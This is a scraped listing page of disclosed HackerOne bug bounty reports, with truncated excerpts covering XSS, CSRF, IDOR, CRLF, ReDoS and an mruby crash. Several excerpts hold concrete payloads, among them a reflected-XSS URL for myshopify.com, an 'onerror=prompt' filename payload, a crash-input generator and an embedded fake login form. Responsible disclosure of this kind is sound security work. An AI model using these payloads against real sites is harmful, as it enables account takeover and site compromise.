HackerOne Reports
Search through disclosed security reports
10,350 reports found
Showing 141 - 160
Hi There exists a vulnerability in mruby when using the heredoc notation (it doesn't need ulimit) The minified test can be generated with the following command: ``` ruby -e 'IO.binwrite("j_3_.rb", "\xa7<l while\x270\x27><<i\x00" + ("\x0a" * 0x3ffd) + "i\x0a")' ``` log: ``` root@Ubuntu-1604-xenial-64-minimal ~/jtest/mruby/bin # ulimit -Sv unlimited; ruby -e 'IO.binwrite("j_3_.rb", …
Hi Team, I have found a logical flaw(NOT DoS) in the website 'https://app.mopub.com/' 1.Use Burp Suite and capture below request upon navigation to *Code integration* 2.Click on Send button after entering email address in the input field of 'Enter one or more email addresses and we'll send you links to …
**Summary:** I've found a DOM-based XSS vulnerability in the website **help.twitter.com** that persists via a localStorage key **lastArticleHref**. The value of this localStorage key is used to dynamically generate a piece of HTML code without proper encoding or filtering allowing an attacker to inject additional HTML code into the response. …
# Description The Simplenote Android application (1.5.6) still allows users to embed fully-fledged forms. ```html Sign in to Simplenote <h1 class="signin">Please sign in</h1> <br> <form action="https://example.com/login.php" id="login" name="login"> <fieldset class="classic-fieldset" style="border:none;"> <div class="input-fields"> <p style="margin-right: 10px;"><label for="email">Email</label><input id="email" name="email" placeholder="Email" required="" style="padding: 0.3em;font-size: 14px;font-size: 21px;font-weight: 300;max-width: 35em;height: 44px;border: px solid …
Hi everyone, Hope you are well ! I come to report here an IDOR vulnerability on the Deck application of Nextcloud, allowing to delete any attached file(s) on any cards. Nextcloud deck app version : latest stable `1.8.0` ## Steps To Reproduce: The Nextcloud Deck application now offers the ability …
Hi, When [REXML](https://github.com/ruby/rexml) is used to parse an XML that has many digits between `&#` and `x...;` in a hex numeric character reference `(&#x...;)` may lead to ReDos. Advisory: https://www.ruby-lang.org/en/news/2024/10/28/redos-rexml-cve-2024-49761/ ## Impact Reduced performance or Denial of Service was possible where REXML is used to parse user input.
## Summary: It's possible to list all hidden files that are located within the TVAVirtual.com Sharepoint folder structure. ## Steps To Reproduce: 1. Navigate to TvaVirtual.com 2. Open the pages source code and notice that its build using sharepoint pages. 3. Confirm that you see a listing for /SiteAssets/Scripts/js.cookie.min.js. Click …
**Description:** i find in periscope.tv a parameter "create_user" allow to inject "loginissignup" cookie, when tested with crlf payload get response "**HTTP/1.1 504 GATEWAY_TIMEOUT**" ** Link Vulnerable:** https://www.periscope.tv/i/twitter/login?create_user=*payload*&csrf=*your_csrf_token* ## Steps To Reproduce: 1. go to https://www.periscope.tv/ 2. click to login 3. click create new account 4. choose twitter [ google & …
Periscope android app deeplink leads to CSRF in follow action
Low
$1,540
Closed
Hello Twitter Team #Summary This issue is mainly in the Periscope Android app against CSRF follow action using deeplink. #Description In normal Periscope Website, when we share a follow link like `www.pscp.tv/<user-id>/follow`, we get a response whether to follow a person or not, giving us an option, means CSRF protection …
I want to report bug XSS in "ADD IMAGES" How To Produce it : 1. Login to your Account 2. Then Add Images With XSS Payload In filename (example : "><img src=x onerror=prompt(document.domain)>.png) 3. Click on Image that you upload 4. in the name of picture XSS will fired ## …
*.myshopify.com is vulnerable to a reflective cross-site scripting attack in the newsletter form. This can be crafted to trigger on a page load without any further user interaction. The following example url shows this vulnerability: ``` https://testbuguser.myshopify.com/?contact[email]%20onfocus%3djavascript:alert(%27xss%27)%20autofocus%20a=a&form_type[a]aaa ``` This was tested on a newly registered store "testbuguser.myshopify.com" If you require …
Burp Suite utilizes an embedded Chrome browser for crawling and scanning web applications. The Chrome instance is launched in headless mode, with remote debugging enabled via the remote-debugging websocket port instead of remote-debugging-pipe. As a result, a known XSS vulnerability in Chrome can be leveraged in combination with a JavaScript …
unable to register since the passwords are unable to match.Check the attachment.
#Description: Microsoft .NET Framework is prone to multiple NULL-byte injection vulnerabilities because it fails to adequately sanitize user-supplied data. #Vulnerable URL: https://████/%2F%20This%20website%20is%20vulnerable%20to%20NULL%20BYTE%20INJECTION/ #Steps to Reproduce: 1) An attacker can exploit this issue via a browser. The following example URI request is available: https://███████/%2F%20This%20website%20is%20vulnerable%20to%20NULL%20BYTE%20INJECTION%00 #Mitigation: https://www.securityfocus.com/bid/24791/solution #See Also: https://www.exploit-db.com/exploits/30281 #Proof of …
Hi there, It is possible to delete anyone's added email,telephone,fax,address,Skype via CSRF in `GET` method. The action is performed via `GET`method without any CSRF protection. # Steps to reproduce - login to your https://academy.acronis.com account - navigate to `https://academy.acronis.com/#/account/edit/account_id/<your_id>` - add any email,telphone,fax,addres,skype - try deleting them and capture the …